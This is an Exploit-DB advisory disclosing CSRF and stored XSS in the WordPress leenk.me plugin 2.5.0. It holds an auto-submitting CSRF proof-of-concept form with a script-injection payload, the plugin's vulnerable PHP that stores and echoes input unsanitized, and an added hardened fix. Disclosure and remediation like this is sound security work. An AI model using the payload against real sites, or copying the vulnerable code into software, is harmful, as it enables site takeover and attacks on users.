WordPress leenk.me Plugin 2.5.0 - CSRF/XSS

ID EDB-ID:39704
Type exploitdb
Reporter cor3sm4sh3r
Modified 2016-04-18T00:00:00


WordPress leenk.me Plugin 2.5.0 - CSRF/XSS. Webapps exploit for php platform

I would like to disclose a CSRF and stored XSS vulnerability in the WordPress
plugin LeenkMe version 2.5.0.

The plugin can be found at https://wordpress.org/plugins/leenkme/

The affected page is wp-content/plugins/leenkme/facebook.php

The fields vulnerable to XSS are:

   - facebook_message
   - facebook_linkname
   - facebook_caption
   - facebook_description
   - default_image
   - _wp_http_referer

This CSRF was tested on the latest WordPress installation (4.4.2) using Firefox.

The code for CSRF.html is

  <body onload="document.forms['xss'].submit()" >
    <form name="xss" action="" method="POST">
      <input type="hidden" name="facebook_profile" value="on" />
      <input type="hidden" name="fb_publish_wpnonce" value="" />
      <input type="hidden" name="_wp_http_referer" value="XSS" />
      <input type="hidden" name="facebook_message" value="XSS" />
      <input type="hidden" name="facebook_linkname" value="XSS" />
      <input type="hidden" name="facebook_caption" value="XSS" />
      <input type="hidden" name="facebook_description" value="</textarea><script>prompt();</script>" />
      <input type="hidden" name="default_image" value="XSS" />
      <input type="hidden" name="message_preference" value="author" />
      <input type="hidden" name="clude" value="in" />
      <input type="hidden" name="publish_cats[]" value="0" />
      <input type="hidden" name="update_facebook_settings" value="Save Settings" />
      <input type="submit" value="Submit form" />
    </form>
  </body>

The vulnerable page is


The vulnerable code producing the XSS is (each request value is stored verbatim,
without sanitization, and the settings are later echoed unescaped):

if ( !empty( $_REQUEST['facebook_message'] ) )
    $user_settings['facebook_message'] = $_REQUEST['facebook_message'];
else
    $user_settings['facebook_message'] = '';
if ( !empty( $_REQUEST['facebook_linkname'] ) )
    $user_settings['facebook_linkname'] = $_REQUEST['facebook_linkname'];
else
    $user_settings['facebook_linkname'] = '';
if ( !empty( $_REQUEST['facebook_caption'] ) )
    $user_settings['facebook_caption'] = $_REQUEST['facebook_caption'];
else
    $user_settings['facebook_caption'] = '';
if ( !empty( $_REQUEST['facebook_description'] ) )
    $user_settings['facebook_description'] = $_REQUEST['facebook_description'];


<td><textarea name="facebook_message" style="width: 500px;"><?php echo $user_settings['facebook_message']; ?></textarea></td>
<td><?php _e( 'Default Link Name:', 'leenkme' ); ?></td>
<td><input name="facebook_linkname" type="text" style="width: 500px;" value="<?php echo $user_settings['facebook_linkname']; ?>" maxlength="100"/></td>
<td><?php _e( 'Default Caption:', 'leenkme' ); ?></td>
<td><input name="facebook_caption" type="text" style="width: 500px;" value="<?php echo $user_settings['facebook_caption']; ?>" maxlength="100"/></td>
<td style='vertical-align: top; padding-top: 5px;'><?php _e( 'Default Description:', 'leenkme' ); ?></td>
<td><textarea name="facebook_description" style="width: 500px;" maxlength="300"><?php echo $user_settings['facebook_description']; ?></textarea></td>

The code meant to protect against CSRF (the anti-CSRF nonce field emitted into the form) is

<?php wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' ); ?>

But this code does not protect against CSRF: emitting the nonce field is only half
of the protection, and the submitted value is never verified, so the form is
processed successfully without any error even when fb_publish_wpnonce is left
empty, resulting in a CSRF vulnerability.
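The two defects above (unverified nonce, unescaped output) are fixed together in the following handler. This is an added example written for this page, not the plugin's own code or a vendor patch; it assumes it runs inside WordPress (so wp_verify_nonce(), current_user_can(), wp_unslash(), sanitize_text_field(), wp_strip_all_tags(), esc_attr(), esc_textarea(), wp_nonce_field() and wp_die() are available), that $user_settings is the same per-user settings array shown in the advisory, and that the function names leenkme_save_facebook_settings and leenkme_render_facebook_fields and the manage_options capability are choices made here, not names from the plugin.

```php
<?php
/**
 * Added example (not the plugin's code): hardened save handler for the
 * Facebook settings form. Function names and the capability are assumptions.
 *
 * Returns the sanitized settings array, or a WP_Error when the request
 * must be rejected.
 */
function leenkme_save_facebook_settings( array $user_settings ) {
    // 1. CSRF: the nonce must be present AND verified. wp_nonce_field() in the
    //    form only emits the token; wp_verify_nonce() is the missing other half.
    //    It returns false for an empty string, which closes the PoC's "" nonce.
    $nonce = isset( $_POST['fb_publish_wpnonce'] ) ? $_POST['fb_publish_wpnonce'] : '';
    if ( '' === $nonce || ! wp_verify_nonce( $nonce, 'fb_publish' ) ) {
        return new WP_Error( 'leenkme_bad_nonce', 'Security check failed.' );
    }

    // 2. Authorization: a valid nonce proves intent, not permission.
    //    (manage_options is an assumed capability; use the plugin's real one.)
    if ( ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'leenkme_forbidden', 'Insufficient permissions.' );
    }

    // 3. Input handling: read only from $_POST (not $_REQUEST, which also
    //    accepts GET and cookies), strip WordPress' magic slashes, and sanitize
    //    each field instead of storing the raw value.
    foreach ( array( 'facebook_linkname', 'facebook_caption', 'default_image' ) as $field ) {
        $user_settings[ $field ] = isset( $_POST[ $field ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $field ] ) )
            : '';
    }
    // Multi-line fields: sanitize_text_field() collapses newlines, so strip
    // tags while keeping line breaks. (sanitize_textarea_field() only exists
    // from WordPress 4.7; the advisory tested on 4.4.2.)
    foreach ( array( 'facebook_message', 'facebook_description' ) as $field ) {
        $user_settings[ $field ] = isset( $_POST[ $field ] )
            ? wp_strip_all_tags( wp_unslash( $_POST[ $field ] ) )
            : '';
    }
    // _wp_http_referer is deliberately never stored or echoed; if a redirect
    // target is needed, wp_get_referer() validates it against the site.
    return $user_settings;
}

/**
 * Output side: escape at render time with the escaper that matches the
 * context. esc_textarea() encodes "<" so a stored "</textarea><script>"
 * value cannot break out of the element; esc_attr() does the same for
 * the value="" attributes.
 */
function leenkme_render_facebook_fields( array $user_settings ) {
    ?>
    <td><textarea name="facebook_message" style="width: 500px;"><?php
        echo esc_textarea( $user_settings['facebook_message'] ); ?></textarea></td>
    <td><input name="facebook_linkname" type="text" style="width: 500px;"
        value="<?php echo esc_attr( $user_settings['facebook_linkname'] ); ?>" maxlength="100"/></td>
    <td><input name="facebook_caption" type="text" style="width: 500px;"
        value="<?php echo esc_attr( $user_settings['facebook_caption'] ); ?>" maxlength="100"/></td>
    <td><textarea name="facebook_description" style="width: 500px;" maxlength="300"><?php
        echo esc_textarea( $user_settings['facebook_description'] ); ?></textarea></td>
    <?php
    // Emit the nonce field; it is now paired with the verification above.
    wp_nonce_field( 'fb_publish', 'fb_publish_wpnonce' );
}

// Usage inside the settings page: reject forged or unauthorized submissions
// with a 403 before anything is written.
if ( isset( $_POST['update_facebook_settings'] ) ) {
    $result = leenkme_save_facebook_settings( $user_settings );
    if ( is_wp_error( $result ) ) {
        wp_die( esc_html( $result->get_error_message() ), '', array( 'response' => 403 ) );
    }
    $user_settings = $result;
}
```

The design point is that the two halves are independent: nonce verification stops the cross-site submission, and output escaping stops the stored payload from executing even if a value reaches the settings by some other path (an older unsanitized record, a different entry point), so a fix that applies only one of them leaves the other class of bug in place.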

# Author email: cor3sm4sh3r[at]gmail.com
# Contact: https://in.linkedin.com/in/cor3sm4sh3r
# Twitter: https://twitter.com/cor3sm4sh3r